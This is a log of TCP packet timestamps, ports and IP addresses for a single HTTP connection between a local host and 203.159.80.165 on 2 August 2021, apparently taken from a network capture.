Aug 2, 2021 11:00:29.926810026 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926812887 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926820040 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926841974 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926841974 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926866055 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926887035 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926888943 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926888943 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926911116 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926913023 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926937103 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926939011 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926959991 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926964045 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926966906 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926980972 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927001953 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927009106 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927011013 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927023888 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927048922 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927050114 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927073956 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927077055 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927083015 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927095890 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927102089 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927143097 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927165985 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927181005 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927192926 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927196026 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927205086 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927223921 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927227020 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927227974 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927248955 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927259922 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927263021 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927273035 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927297115 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927313089 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927318096 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927320004 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927345037 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927352905 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927356958 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927367926 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927392960 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927401066 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927406073 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927416086 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927440882 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927459955 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927473068 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927476883 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927479982 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927483082 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927510023 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927512884 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927517891 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927535057 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927548885 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927560091 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927583933 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927593946 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927599907 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927607059 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927629948 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927651882 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927654028 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927658081 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927661896 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927675009 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927681923 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927696943 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927721024 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927731991 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927736044 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927743912 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927766085 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927776098 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927781105 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927787066 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927808046 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927828074 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927829981 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927833080 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927851915 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927871943 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927875996 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927876949 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927900076 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927910089 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927917957 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927921057 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927942038 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927961111 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927963972 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927964926 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927985907 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.927993059 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.927999020 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928008080 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928030014 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928050041 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928052902 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928056955 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928077936 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928081036 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928083897 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928098917 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928122044 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928132057 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928137064 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928143978 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928164959 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928174019 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928177118 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928186893 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928208113 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928229094 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928232908 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928232908 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928236961 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928255081 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928262949 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928276062 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928287029 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928297997 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928304911 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928319931 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928340912 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928349018 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928354025 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928363085 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928385019 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928392887 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928395987 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928410053 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928431988 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928443909 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928448915 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928452969 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928474903 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928482056 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928486109 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928498030 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928519011 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928524971 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928528070 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928540945 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928561926 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928586960 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.928607941 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928613901 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928617001 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.928625107 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948156118 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948193073 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948215008 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948236942 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948259115 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948286057 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948323965 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948344946 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948347092 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948367119 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948371887 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948375940 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948379040 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948381901 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948385000 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948388100 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948389053 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948390961 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948394060 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948410988 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948421955 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948432922 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948456049 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948468924 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948472977 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948481083 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948503971 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948514938 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948519945 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948525906 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948561907 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948580980 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948582888 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948585987 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948605061 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948613882 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948618889 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948626995 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948649883 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948659897 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948664904 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948676109 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948699951 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948708057 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948712111 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948720932 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948740005 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948750019 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948754072 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948761940 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948786020 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948786974 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948790073 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948810101 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948831081 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948843956 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948848963 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948853970 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948874950 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948883057 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948887110 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948896885 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948919058 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948925972 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948929071 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948940992 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948966980 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.948982000 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948987007 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.948988914 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949008942 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949014902 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949018955 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949028969 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949052095 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949060917 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949064970 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949074030 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949090958 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949110031 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949131966 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949140072 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949146032 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949150085 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949152946 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949171066 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949177980 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949194908 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949199915 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949202061 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949223042 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949234009 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949239016 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949244022 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949265957 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949275017 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949280024 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949287891 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949309111 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949320078 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949323893 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949328899 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949352980 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949357033 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949362040 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949374914 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949398041 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.949404955 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949409962 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.949420929 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
                                Aug 2, 2021 11:00:29.949440002 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949451923 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949456930 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949459076 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949479103 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949486017 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949490070 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949500084 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949537039 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949546099 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949551105 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949559927 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949583054 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949600935 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949605942 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949609041 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949630976 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949641943 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949646950 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949652910 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949673891 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.949687958 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.949692965 CEST4916980192.168.2.22203.159.80.165
